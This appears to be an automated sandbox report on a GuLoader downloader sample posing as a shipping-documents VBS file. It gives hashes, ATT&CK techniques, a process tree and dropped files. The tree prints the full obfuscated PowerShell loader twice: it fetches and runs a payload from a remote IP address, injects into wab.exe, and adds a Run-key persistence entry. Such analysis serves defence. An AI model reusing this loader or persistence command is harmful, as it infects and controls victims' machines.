guloader | 8f6edaf7a58a791bf05eb1d5d3bac18561dad46b591bf0a3ed498358fa875e9d

General

Target

awb_shipping_documents_17_04_2024_00000.vbs
Size

932KB
MD5

ac5b979626e0255c763834243ddf8028
SHA1

507a1e4daa53d11c2453fd4c707260a5b8f054fc
SHA256

8f6edaf7a58a791bf05eb1d5d3bac18561dad46b591bf0a3ed498358fa875e9d
SHA512

8e5c0d73c6e3a11d44f010e35fd1eeefc650bb0f0bdaba972769b84d61fec39c168c8237dfe3f2d851371d8fe0289178af4ef28d2ec693cf10e769eeb39bd828
SSDEEP

12288:YGS9YA36Oat2ZWorFnXJD5b9NVzWixJ3q+DhXYBauruyZv:YGSSy6/IZWortfbBz7JTFXYUbyl

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 2 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 1956 WScript.exe
6 2444 powershell.exe

flow	pid	process
3	1956	WScript.exe
6	2444	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Problemopfattelser = "%Botulism% -w 1 $Skovmrkes=(Get-ItemProperty -Path 'HKCU:\\Laplndere1\\').Kissemisseriernes164;%Botulism% ($Skovmrkes)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

1672 wab.exe
1672 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1268 powershell.exe
1672 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1268 set thread context of 1672 1268 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1896 reg.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

2444 powershell.exe
1268 powershell.exe
1268 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1268 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2444 powershell.exe
Token: SeDebugPrivilege 1268 powershell.exe

pid	process
1672	wab.exe
1672	wab.exe

pid	process
1268	powershell.exe
1672	wab.exe

description	pid	process	target process
PID 1268 set thread context of 1672	1268	powershell.exe	wab.exe

pid	process
1896	reg.exe

pid	process
2444	powershell.exe
1268	powershell.exe
1268	powershell.exe

pid	process
1268	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	1268	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 1956 wrote to memory of 2444	1956	WScript.exe	powershell.exe
PID 1956 wrote to memory of 2444	1956	WScript.exe	powershell.exe
PID 1956 wrote to memory of 2444	1956	WScript.exe	powershell.exe
PID 2444 wrote to memory of 2576	2444	powershell.exe	cmd.exe
PID 2444 wrote to memory of 2576	2444	powershell.exe	cmd.exe
PID 2444 wrote to memory of 2576	2444	powershell.exe	cmd.exe
PID 2444 wrote to memory of 1268	2444	powershell.exe	powershell.exe
PID 2444 wrote to memory of 1268	2444	powershell.exe	powershell.exe
PID 2444 wrote to memory of 1268	2444	powershell.exe	powershell.exe
PID 2444 wrote to memory of 1268	2444	powershell.exe	powershell.exe
PID 1268 wrote to memory of 1636	1268	powershell.exe	cmd.exe
PID 1268 wrote to memory of 1636	1268	powershell.exe	cmd.exe
PID 1268 wrote to memory of 1636	1268	powershell.exe	cmd.exe
PID 1268 wrote to memory of 1636	1268	powershell.exe	cmd.exe
PID 1268 wrote to memory of 1672	1268	powershell.exe	wab.exe
PID 1268 wrote to memory of 1672	1268	powershell.exe	wab.exe
PID 1268 wrote to memory of 1672	1268	powershell.exe	wab.exe
PID 1268 wrote to memory of 1672	1268	powershell.exe	wab.exe
PID 1268 wrote to memory of 1672	1268	powershell.exe	wab.exe
PID 1268 wrote to memory of 1672	1268	powershell.exe	wab.exe
PID 1672 wrote to memory of 2220	1672	wab.exe	cmd.exe
PID 1672 wrote to memory of 2220	1672	wab.exe	cmd.exe
PID 1672 wrote to memory of 2220	1672	wab.exe	cmd.exe
PID 1672 wrote to memory of 2220	1672	wab.exe	cmd.exe
PID 2220 wrote to memory of 1896	2220	cmd.exe	reg.exe
PID 2220 wrote to memory of 1896	2220	cmd.exe	reg.exe
PID 2220 wrote to memory of 1896	2220	cmd.exe	reg.exe
PID 2220 wrote to memory of 1896	2220	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_17_04_2024_00000.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autopsychic = 1;$Nonaccompaniment='Substrin';$Nonaccompaniment+='g';Function Deflorerings($Systematician){$Butiksvinduers=$Systematician.Length-$Autopsychic;For($Faglitteraturen=6; $Faglitteraturen -lt $Butiksvinduers; $Faglitteraturen+=(7)){$Precordium+=$Systematician.$Nonaccompaniment.Invoke($Faglitteraturen, $Autopsychic);}$Precordium;}function Svns($Caedmonian){.($Roup) ($Caedmonian);}$Slangernes=Deflorerings 'ObligeM ApopeoIsolerz UdmaaiBigaralTr,tanlMacfaraAvidsp/E.cava5 Waste.Overbb0 Ba,re Trich(PlanerWSkjtefiArb jdnUn itidRe,ovaoS aamaw PretasSultek TrstigNSnableTForvrr Kejser1 gener0Folket.Anf el0Endova; Patri AustraWCivilaiGenertnTjenes6Forelo4Bygnin;Tokaye MetakrxBlo.fa6Flitwi4Selvra;la,gis undvrr FreshvGolden:telefo1Af,ngi2Ordreb1Thiocr.Abon i0 ufty)Slyngp IllyasGPrinsaefurc,acSuffelkCanel.oNantzs/ heavy2Kippag0Un.ann1I,mola0Common0Unch,d1Fertil0 Fontn1Specia StaalaF Kry tiFrst drudvik e KorrufL mfatoTroch,xHindgu/Apocat1Inut l2Philos1Ternst.Konsul0Skifte ';$Unsonorousness=Deflorerings 'FadmonUHurrersBunchieBordigrSejtrk- DristA aisangStemnieIntersn TushitCsects ';$Nedrullet=Deflorerings 'Bora,chTrhvept.nspirtOpsparpH.esit:Stroke/Stjmaa/ Skakk8Hypoph7H.glin.Synkre1 Paahn2Deface1Geolog.Slavia1Hedgi 0Circu 5pseudo.Delfin1Rekurs8Ve.miv4Dgnber/ExorciG Pe calTyvekoeSkelsaa Stream untsve FoilarCanoni.Fri,jumFe reriBef agxH drar ';$Justeringstabels=Deflorerings 'Unvari>Lnm,dt ';$Roup=Deflorerings ' letteiSrgespeRetra xsyll.b ';$Implicate = Deflorerings 'ReconveAvledycDekorah C.enoo studs Obduk %,ermutaWithypp Fr.adp BiscudSengebaDep tetHe.lggaChilie%Intole\Kart tTEksplohAc,lyprFleejoi .elefpS rubepBranchlsolacee Caden.TatarieD cigrk SidepsVarmet Brnela&Bescou&Boso s CorticePassagcCa,suihExultioformal Assecu$Araber ';Svns (Deflorerings 'Falkeb$PermutgfleshqlTria toDesil,bLivssta prokul,ljlss: TaarnV.ndbrao eglulMutterdi.speksBorgerk Slukn=Karamb(diagracTor,edmSandsld Septe .ronko/ Catamc Pros. Jagtg$searedIforhanmPanclap Bal nlEpitimiRe fnicProbataOv,rtitOr erne Ditte)Skumme ');Svns (Deflorerings ' Colos$Skftnigcarperl hausso Comp.bFellowaHibernlFlau.o:BevidnvT ughgeF.erbrj,eadlesEtterey MedersBiksemtroderie DannemPaint.e Sno,dt F rsk=Stoppe$UnpiniNKathleeBurdebdResultr StatiuLoesnilElihu lTamidieSynkopt,nderc. .ocaks SkiedpEgyptelKh rajiplaywrtspatan(vindik$TempelJsukkerurentersS,ueretFertileStud.erMa,kuriAtomisn,erigrg SpanksHeroshtWandera SpearbBun,reeDak,yllWuzzlesForsig)Pinda ');$Nedrullet=$vejsystemet[0];Svns (Deflorerings ' Scr.f$MicrosgNonappl Davcuo ,rirobTilfrsaRe coalTinget:AftrykI G,ubbngentiltNotidae .rster GennepHypoblrForheke Cubantmacrono.lysesr iaphai ResulaOutsenlArgume=BlazonNVaniste.asseswDi.tra-Ko.denOAblatibReemphjSwingeeFiolencFathertHanlec Cry toSJudd,oyAfkr.gs rekretRe.ysdeCysto mOccip,.Stofs N Ove.feVenos tProgra. MongoWDe siteWightmbCorequC ManiflTilridi BegynekmpersnRecopyt Konno ');Svns (Deflorerings ' siat$Att ciI Sabain MobiltSemicle FristrKennelpFathomrCoastleCoitaltVikario Hyperrlivsfai Ma,ceaGro.ndl Coeff. TarreHplu ereSorrowaGavtyvd PhoraeDistrirWaterssNonthe[Bl,ckh$KollagU kvatmn uphausAfvigeoParlamn CathooElefa,rPrearro Verniu .orgesDemon,nFi.mafeJulekasKor.sps Macr ]Ronked= Bre b$ GalvaSIntra.l DesseaTrustdnP igesgLeucoseGiasqurStavninFuldmaeDigte,sBranch ');$Trefoldig164=Deflorerings 'FlytteI KunstnMargratAutod.e gard,rCotelepAcronir ,ntegeAtrabitV ndstoUrv,kerOte coiTaetheaVidimul ti,st.AfhugnD A etnoBoeotiw Nonapn.enneilcolo ro Th.rvaAp eldd UnneuFIgnitei Sen.elSlimp,eSke ch(Sides $TriturNMor.eneU,dtagdParaffrNitrosuS.ptemlKlerenl Infeke SuccutWildly,T.icar$ UnappBApplauaUnsounr Spi.sb Laceri Pumict SpeciuWashdarReprogsG,ranty ObseqrBidiale Pandenqi,dar)An,ire ';$Trefoldig164=$Voldsk[1]+$Trefoldig164;$Barbitursyren=$Voldsk[0];Svns (Deflorerings ' ,okul$Efte tgOpsgeslSexpoto NummebHolophasamletl Primi: Fo esMFemvreiTekstilFa.ishd ThicknCapense .mpulsI.suscsUn.aile eckersWalldo= Forur(HelbreT NardueObservsFlfodet Girdi-MalemaPbe kreaFond.mtG nanvhSnonow Bankga$Bran aBTentoraAcanthrEnsteeb Rentei WeekvtDiskriu yalasrMorgensSiph,nyCoenoerPreutieAdvokans,mkri)Predup ');while (!$Mildnesses) {Svns (Deflorerings 'Devote$Abstr.gIvorialBall.to.entenbSteve,aFo,blilHa,rsp: ictaIWharpsnBlankot DispeebdeforgByggunrVat.rliKrlnintHemi yyOutbur= kiven$KvartetLrerflrpri,riuOr,anseIncre ') ;Svns $Trefoldig164;Svns (Deflorerings ' B rbuS.ruttetS,nguia Nonexrse ipetc.quin-SumpskS pkobllGlammeeFemogtePrope.p L nin Fartbl4 Trisy ');Svns (Deflorerings 'Int rc$SpdbargF.rtollNudieso ProsebNdvendaCircu.lPer,on:FoppyfMastigmi InnovlTen.rsdafhentn Mlle,eLyasessLevitisUdbrede Spaghs Drukk= Pulpy(CuboidTmrbankeNstmessWifel tB okbo- AllelP Skim.aOlefintNaturvh Ls.re Retune$TwinylBAccompaIdet frConcorb PhytoiKodakstPaternu Thro rZeugmasMarm.dyR,sserrDinocee,acaden Udpla)Bakked ') ;Svns (Deflorerings 'Interl$Portr.gAbouchlF,rudsofr.idsbPorcdoaBugalalJustif:PistolBCryptoauntailrStodgenQuantiaNon.lagS,deomtMisstai nddkngUncinah BldgreDa nebdbiblioeenjewenkommun=Mllene$ LjtnagLandsdl ElektoRiverbbPodsnaaKippeeltryg,u:BallephDipicruopdagemLance.oUn,erauN.syner,eminaiUmennesE envieProvst+ anven+Recont%Rntgen$nau,ravengouee Kontoj Lugtgs.reaclyHauliesBiogratlydseneFrilbsm agneseStudiet ,egns.Mytterc Hj emoProgr,u biophnEncorbtHacien ') ;$Nedrullet=$vejsystemet[$Barnagtigheden];}Svns (Deflorerings 'Stoneb$kejsergSands,l DuefaoCampshb Loy.laCanabalS agfr:SprosstPsychoeBe,audo Tormer ExpeceT.afiktBillediGod.ikk remhaeSubmarrAbjec,s Pacap Rgskye=B.glad SmiledGVie nee urvntSubpro-CalombCsleighoskumrinU.lbsdtSperlieFlashbnSelvvatSide,l Ra,ika$Ma,ernBSpreneaGgesnarAfsejlbRepriei InklutstranduMreretr AchlosOply,nyGroverr BerufeSvine,n Besig ');Svns (Deflorerings ' lbnin$ NondegWa.chflUdrreuoSec,ssb S,ernapartaklDekli.:Kon.anIKlagedmCu.laspOpelcla.rchosr ontinkOpgrelaVaroomtDe,atriOvervaoSuddsunPia,ab Ekspre=Entero givend[CoriumS UnderyCorrels TanistInheriebuskvkm.erfec.S.icieCmar rkoSkodd.nTelemevLambreeSargasr,vernitBudsti]Nuance:S.erig:UnfibeFIn iolrSk ldpoSkoleemArt,atBKlunteaforev,sIntendeUskyld6dyrk r4LykkefSUnauditScoun rAfsvamiSupersnBondemgoversp( Sheph$Butanetduovi.eUdgydeotroutfrFusaineTe,nastSkrubhiFederakGametoeVarmblrVilhe,s ,cari)Rein,o ');Svns (Deflorerings 'Na riu$OncogegSc,entlZygo.aoConforbPiezoma.prjtelUforso:VoveliSlovelecFiberpuForcerlSnkekll Ns.ebeNik ler C.troy S.ppi Klutzy=Recid Belial[ Krit SArbej.yTramelsTipsyotCultiseAnskafmDr,bbl.Opn aeTKont.re BlystxDuellatHalskd.M,cobaEArbej,nCrosslc ProceoMontefd,udiviiBoy,otn itulagRe,uma]Startp:Faulti:,eodicARust iSHypermCUnpresIPol thI .rede.asteroG,peluneWarinethyacinSJaspert AfhjarS.msvaiOpholdnBlegetgLotasa(Work.n$SpeakeIBefancmLstanspAppletaObskn.rTilskykAllan.aCommietTransci Kmpedo ,nkonnSkanse)Quietu ');Svns (Deflorerings ' Pulse$ Unwagg dis,olvurdero Wa,tabDeccasaTelefolAprils:gnidniA Fe.tlnQueecht,uculaiFreezygPathnarInter aImaginmKussesmUdfldna .asictDeponeiAl.orsc Realiam.salll Und r=Teasin$SpoutlSU gravcNykolouBr.erslBrunsvlSuppree ApabhrNetv,kySasser.Kb tadsKlargou N.carb multisGravertExorcirForfl.iCentran h.lvegPhlegm(Non,xt3 sekra1 ransi9Chondr2Berett0Taleli9Macrop,Whiptu2Om end8Bajone5Glycol0 Ek,ko2foregi)Un.pir ');Svns $Antigrammatical;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thripple.eks && echo $"
3⤵
PID:2576

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autopsychic = 1;$Nonaccompaniment='Substrin';$Nonaccompaniment+='g';Function Deflorerings($Systematician){$Butiksvinduers=$Systematician.Length-$Autopsychic;For($Faglitteraturen=6; $Faglitteraturen -lt $Butiksvinduers; $Faglitteraturen+=(7)){$Precordium+=$Systematician.$Nonaccompaniment.Invoke($Faglitteraturen, $Autopsychic);}$Precordium;}function Svns($Caedmonian){.($Roup) ($Caedmonian);}$Slangernes=Deflorerings 'ObligeM ApopeoIsolerz UdmaaiBigaralTr,tanlMacfaraAvidsp/E.cava5 Waste.Overbb0 Ba,re Trich(PlanerWSkjtefiArb jdnUn itidRe,ovaoS aamaw PretasSultek TrstigNSnableTForvrr Kejser1 gener0Folket.Anf el0Endova; Patri AustraWCivilaiGenertnTjenes6Forelo4Bygnin;Tokaye MetakrxBlo.fa6Flitwi4Selvra;la,gis undvrr FreshvGolden:telefo1Af,ngi2Ordreb1Thiocr.Abon i0 ufty)Slyngp IllyasGPrinsaefurc,acSuffelkCanel.oNantzs/ heavy2Kippag0Un.ann1I,mola0Common0Unch,d1Fertil0 Fontn1Specia StaalaF Kry tiFrst drudvik e KorrufL mfatoTroch,xHindgu/Apocat1Inut l2Philos1Ternst.Konsul0Skifte ';$Unsonorousness=Deflorerings 'FadmonUHurrersBunchieBordigrSejtrk- DristA aisangStemnieIntersn TushitCsects ';$Nedrullet=Deflorerings 'Bora,chTrhvept.nspirtOpsparpH.esit:Stroke/Stjmaa/ Skakk8Hypoph7H.glin.Synkre1 Paahn2Deface1Geolog.Slavia1Hedgi 0Circu 5pseudo.Delfin1Rekurs8Ve.miv4Dgnber/ExorciG Pe calTyvekoeSkelsaa Stream untsve FoilarCanoni.Fri,jumFe reriBef agxH drar ';$Justeringstabels=Deflorerings 'Unvari>Lnm,dt ';$Roup=Deflorerings ' letteiSrgespeRetra xsyll.b ';$Implicate = Deflorerings 'ReconveAvledycDekorah C.enoo studs Obduk %,ermutaWithypp Fr.adp BiscudSengebaDep tetHe.lggaChilie%Intole\Kart tTEksplohAc,lyprFleejoi .elefpS rubepBranchlsolacee Caden.TatarieD cigrk SidepsVarmet Brnela&Bescou&Boso s CorticePassagcCa,suihExultioformal Assecu$Araber ';Svns (Deflorerings 'Falkeb$PermutgfleshqlTria toDesil,bLivssta prokul,ljlss: TaarnV.ndbrao eglulMutterdi.speksBorgerk Slukn=Karamb(diagracTor,edmSandsld Septe .ronko/ Catamc Pros. Jagtg$searedIforhanmPanclap Bal nlEpitimiRe fnicProbataOv,rtitOr erne Ditte)Skumme ');Svns (Deflorerings ' Colos$Skftnigcarperl hausso Comp.bFellowaHibernlFlau.o:BevidnvT ughgeF.erbrj,eadlesEtterey MedersBiksemtroderie DannemPaint.e Sno,dt F rsk=Stoppe$UnpiniNKathleeBurdebdResultr StatiuLoesnilElihu lTamidieSynkopt,nderc. .ocaks SkiedpEgyptelKh rajiplaywrtspatan(vindik$TempelJsukkerurentersS,ueretFertileStud.erMa,kuriAtomisn,erigrg SpanksHeroshtWandera SpearbBun,reeDak,yllWuzzlesForsig)Pinda ');$Nedrullet=$vejsystemet[0];Svns (Deflorerings ' Scr.f$MicrosgNonappl Davcuo ,rirobTilfrsaRe coalTinget:AftrykI G,ubbngentiltNotidae .rster GennepHypoblrForheke Cubantmacrono.lysesr iaphai ResulaOutsenlArgume=BlazonNVaniste.asseswDi.tra-Ko.denOAblatibReemphjSwingeeFiolencFathertHanlec Cry toSJudd,oyAfkr.gs rekretRe.ysdeCysto mOccip,.Stofs N Ove.feVenos tProgra. MongoWDe siteWightmbCorequC ManiflTilridi BegynekmpersnRecopyt Konno ');Svns (Deflorerings ' siat$Att ciI Sabain MobiltSemicle FristrKennelpFathomrCoastleCoitaltVikario Hyperrlivsfai Ma,ceaGro.ndl Coeff. TarreHplu ereSorrowaGavtyvd PhoraeDistrirWaterssNonthe[Bl,ckh$KollagU kvatmn uphausAfvigeoParlamn CathooElefa,rPrearro Verniu .orgesDemon,nFi.mafeJulekasKor.sps Macr ]Ronked= Bre b$ GalvaSIntra.l DesseaTrustdnP igesgLeucoseGiasqurStavninFuldmaeDigte,sBranch ');$Trefoldig164=Deflorerings 'FlytteI KunstnMargratAutod.e gard,rCotelepAcronir ,ntegeAtrabitV ndstoUrv,kerOte coiTaetheaVidimul ti,st.AfhugnD A etnoBoeotiw Nonapn.enneilcolo ro Th.rvaAp eldd UnneuFIgnitei Sen.elSlimp,eSke ch(Sides $TriturNMor.eneU,dtagdParaffrNitrosuS.ptemlKlerenl Infeke SuccutWildly,T.icar$ UnappBApplauaUnsounr Spi.sb Laceri Pumict SpeciuWashdarReprogsG,ranty ObseqrBidiale Pandenqi,dar)An,ire ';$Trefoldig164=$Voldsk[1]+$Trefoldig164;$Barbitursyren=$Voldsk[0];Svns (Deflorerings ' ,okul$Efte tgOpsgeslSexpoto NummebHolophasamletl Primi: Fo esMFemvreiTekstilFa.ishd ThicknCapense .mpulsI.suscsUn.aile eckersWalldo= Forur(HelbreT NardueObservsFlfodet Girdi-MalemaPbe kreaFond.mtG nanvhSnonow Bankga$Bran aBTentoraAcanthrEnsteeb Rentei WeekvtDiskriu yalasrMorgensSiph,nyCoenoerPreutieAdvokans,mkri)Predup ');while (!$Mildnesses) {Svns (Deflorerings 'Devote$Abstr.gIvorialBall.to.entenbSteve,aFo,blilHa,rsp: ictaIWharpsnBlankot DispeebdeforgByggunrVat.rliKrlnintHemi yyOutbur= kiven$KvartetLrerflrpri,riuOr,anseIncre ') ;Svns $Trefoldig164;Svns (Deflorerings ' B rbuS.ruttetS,nguia Nonexrse ipetc.quin-SumpskS pkobllGlammeeFemogtePrope.p L nin Fartbl4 Trisy ');Svns (Deflorerings 'Int rc$SpdbargF.rtollNudieso ProsebNdvendaCircu.lPer,on:FoppyfMastigmi InnovlTen.rsdafhentn Mlle,eLyasessLevitisUdbrede Spaghs Drukk= Pulpy(CuboidTmrbankeNstmessWifel tB okbo- AllelP Skim.aOlefintNaturvh Ls.re Retune$TwinylBAccompaIdet frConcorb PhytoiKodakstPaternu Thro rZeugmasMarm.dyR,sserrDinocee,acaden Udpla)Bakked ') ;Svns (Deflorerings 'Interl$Portr.gAbouchlF,rudsofr.idsbPorcdoaBugalalJustif:PistolBCryptoauntailrStodgenQuantiaNon.lagS,deomtMisstai nddkngUncinah BldgreDa nebdbiblioeenjewenkommun=Mllene$ LjtnagLandsdl ElektoRiverbbPodsnaaKippeeltryg,u:BallephDipicruopdagemLance.oUn,erauN.syner,eminaiUmennesE envieProvst+ anven+Recont%Rntgen$nau,ravengouee Kontoj Lugtgs.reaclyHauliesBiogratlydseneFrilbsm agneseStudiet ,egns.Mytterc Hj emoProgr,u biophnEncorbtHacien ') ;$Nedrullet=$vejsystemet[$Barnagtigheden];}Svns (Deflorerings 'Stoneb$kejsergSands,l DuefaoCampshb Loy.laCanabalS agfr:SprosstPsychoeBe,audo Tormer ExpeceT.afiktBillediGod.ikk remhaeSubmarrAbjec,s Pacap Rgskye=B.glad SmiledGVie nee urvntSubpro-CalombCsleighoskumrinU.lbsdtSperlieFlashbnSelvvatSide,l Ra,ika$Ma,ernBSpreneaGgesnarAfsejlbRepriei InklutstranduMreretr AchlosOply,nyGroverr BerufeSvine,n Besig ');Svns (Deflorerings ' lbnin$ NondegWa.chflUdrreuoSec,ssb S,ernapartaklDekli.:Kon.anIKlagedmCu.laspOpelcla.rchosr ontinkOpgrelaVaroomtDe,atriOvervaoSuddsunPia,ab Ekspre=Entero givend[CoriumS UnderyCorrels TanistInheriebuskvkm.erfec.S.icieCmar rkoSkodd.nTelemevLambreeSargasr,vernitBudsti]Nuance:S.erig:UnfibeFIn iolrSk ldpoSkoleemArt,atBKlunteaforev,sIntendeUskyld6dyrk r4LykkefSUnauditScoun rAfsvamiSupersnBondemgoversp( Sheph$Butanetduovi.eUdgydeotroutfrFusaineTe,nastSkrubhiFederakGametoeVarmblrVilhe,s ,cari)Rein,o ');Svns (Deflorerings 'Na riu$OncogegSc,entlZygo.aoConforbPiezoma.prjtelUforso:VoveliSlovelecFiberpuForcerlSnkekll Ns.ebeNik ler C.troy S.ppi Klutzy=Recid Belial[ Krit SArbej.yTramelsTipsyotCultiseAnskafmDr,bbl.Opn aeTKont.re BlystxDuellatHalskd.M,cobaEArbej,nCrosslc ProceoMontefd,udiviiBoy,otn itulagRe,uma]Startp:Faulti:,eodicARust iSHypermCUnpresIPol thI .rede.asteroG,peluneWarinethyacinSJaspert AfhjarS.msvaiOpholdnBlegetgLotasa(Work.n$SpeakeIBefancmLstanspAppletaObskn.rTilskykAllan.aCommietTransci Kmpedo ,nkonnSkanse)Quietu ');Svns (Deflorerings ' Pulse$ Unwagg dis,olvurdero Wa,tabDeccasaTelefolAprils:gnidniA Fe.tlnQueecht,uculaiFreezygPathnarInter aImaginmKussesmUdfldna .asictDeponeiAl.orsc Realiam.salll Und r=Teasin$SpoutlSU gravcNykolouBr.erslBrunsvlSuppree ApabhrNetv,kySasser.Kb tadsKlargou N.carb multisGravertExorcirForfl.iCentran h.lvegPhlegm(Non,xt3 sekra1 ransi9Chondr2Berett0Taleli9Macrop,Whiptu2Om end8Bajone5Glycol0 Ek,ko2foregi)Un.pir ');Svns $Antigrammatical;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thripple.eks && echo $"
4⤵
PID:1636

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Problemopfattelser" /t REG_EXPAND_SZ /d "%Botulism% -w 1 $Skovmrkes=(Get-ItemProperty -Path 'HKCU:\Laplndere1\').Kissemisseriernes164;%Botulism% ($Skovmrkes)"
5⤵
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Problemopfattelser" /t REG_EXPAND_SZ /d "%Botulism% -w 1 $Skovmrkes=(Get-ItemProperty -Path 'HKCU:\Laplndere1\').Kissemisseriernes164;%Botulism% ($Skovmrkes)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:1896

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD9A.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarDAC.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarFB5.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2IH6QYKYRL6PJW3NFVRN.temp
Filesize
7KB

MD5
7de5037550dbcacc5861ca57161b3077

SHA1
81edb2170c59b044a4f460e42c80d9b01b3a9aea

SHA256
f65b6f04c9762ceae54ec9819603ce350aa30444abb3396f1bba721364b593ca

SHA512
ab026482eaa46c3808e9fe1b1e33d9fa07d668502862f2ea514de5461ccf57fa8529c15841084f70bb56944aff5031f69631a366ade4957fd7fda06e55e23101

Download Submit
C:\Users\Admin\AppData\Roaming\Thripple.eks
Filesize
452KB

MD5
0f56c5454d3315827edea50167f678c1

SHA1
e13842a8e912fab304fb989554270c3204edd1d2

SHA256
79d42ee82d0f26e5f7989bb43c27048d1267ad84d79ba7293a4761d7dd679bfa

SHA512
abde5b1acf4850deed6dff53b86ba43afd5f0be9a5d6d900261ec1019b6624c4e04b1ef8f23a3842c6bdd6d6af127647f046757ca1df576e1215444a12bdac5f

Download Submit
memory/1268-101-0x0000000077630000-0x00000000777D9000-memory.dmp

Filesize
1.7MB

Download
memory/1268-102-0x0000000002C70000-0x0000000002CB0000-memory.dmp

Filesize
256KB

Download
memory/1268-103-0x0000000077820000-0x00000000778F6000-memory.dmp

Filesize
856KB

Download
memory/1268-100-0x0000000073720000-0x0000000073CCB000-memory.dmp

Filesize
5.7MB

Download
memory/1268-96-0x00000000065B0000-0x000000000BF22000-memory.dmp

Filesize
89.4MB

Download
